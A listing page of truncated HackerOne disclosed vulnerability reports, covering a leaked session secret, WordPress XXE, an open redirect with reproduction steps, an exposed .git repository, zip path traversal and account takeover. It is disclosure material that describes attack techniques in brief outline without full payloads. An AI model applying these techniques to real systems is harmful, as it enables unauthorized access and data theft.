HackerOne Reports
Search through disclosed security reports
10,014 reports found
Showing 1 - 20
While doing recon on Algolia, I found that the session secret for facebooksearch.algolia.com has been committed to a **public** GitHub repository. Since the Rails app running at `facebooksearch.algolia.com` is using `CookieStore` as the session storage, this means an attacker knowing the session secret can craft any cookie that will then …
## Description: The WordPress core Media Library does not securely parse XML content when running on PHP 8. By uploading a malicious .wav file, an authenticated attacker can trigger a XXE vulnerability which enables to read secret system files, DoS the web server, perform SSRF, or aim at Remote Code …
Ability to bypass Admin override on Cloudflare WARP Android
High
$1,100
Closed
During Apple Pay in-app or on-site payments the device generates a payment cryptogram, which contains a transaction ID, encrypted payment data, etc. This is an example of the cryptogram which the phone passes to the internet acquiring service on api.transferwise.com: ``` "token": { "paymentData": { "version": "EC_v1", "data": "tJ*", "signature": …
Steps To Reproduce: ===================== >1_ visit : [Normal Link](https://iandunn.name/wordpress/wp-login.php?redirect_to=https%3A%2F%2Fiandunn.name%2Fwordpress%2Fwp-admin%2F&reauth=1). >2_ Sign-in with your wordpress account and you will directed to [This](https://iandunn.name/wordpress/wp-admin/) >3_Change the value of the **Parameter** : redirect_to .. To the attacker website let's say : (https://vul-example.com) >4_**NOTE THAT** : you must URL-encode the vulnerable link first ## Impact …
**Summary:** I found a .git repository on https://███████.mil/.git which discloses an API password for Yubikey on 2 different domains, together with full source code. **Description:** Fetching the git repository and decompressing the objects results in the ability to read the source code of the server, which includes an API password …
I realise this doesn't qualify for a reward, as it's a vulnerability in a third-party app, but as the app is part of the "official" VM image provided by Hansson IT, I think it's well worth fixing. The Extract app doesn't validate the path or filename of a zip file …
Hello Team #Description In the continuous series of 12 days, twelve flags were hidden inside Hackyholidays site - hackyholidays.h1ctf.com in which once we get all the flags, grinch can be stopped. This write-up will describe solving all the 12 days challenges. #Step To Reproduce + It all started when hackerone …
Able to Takeover Merchants Accounts Even They Have Already Setup SSO, After Bypassing the Email Confirmation ## Summary This report is based on the scenario that email confirmation has been bypassed already, like shown in #791775. What happened in #791775 was, I was too excited and didn't take a step …
Greetings!, Hope Y'all good and fine. ## Summary: I would like to report another vulnerability very Similar to my other report in #975991 Due to lack of secure design, I was able to find the origin IPs behind Cloludflare WAF. The IPs I found belong to : 3d.cs.money ## Description: …
I found other code chunk that leads to memory leakage. ``` exif_process_IFD_in_TIFF(ImageInfo, entry_offset, sub_section_index); if (section_index!=SECTION_THUMBNAIL && entry_tag==TAG_SUB_IFD) { if (ImageInfo->Thumbnail.filetype != IMAGE_FILETYPE_UNKNOWN && ImageInfo->Thumbnail.size && ImageInfo->Thumbnail.offset && ImageInfo->read_thumbnail ) { #ifdef EXIF_DEBUG exif_error_docref(NULL EXIFERR_CC, ImageInfo, E_NOTICE, "%s THUMBNAIL @0x%04X + 0x%04X", ImageInfo->Thumbnail.data ? "Ignore" : "Read", ImageInfo->Thumbnail.offset, ImageInfo->Thumbnail.size); #endif …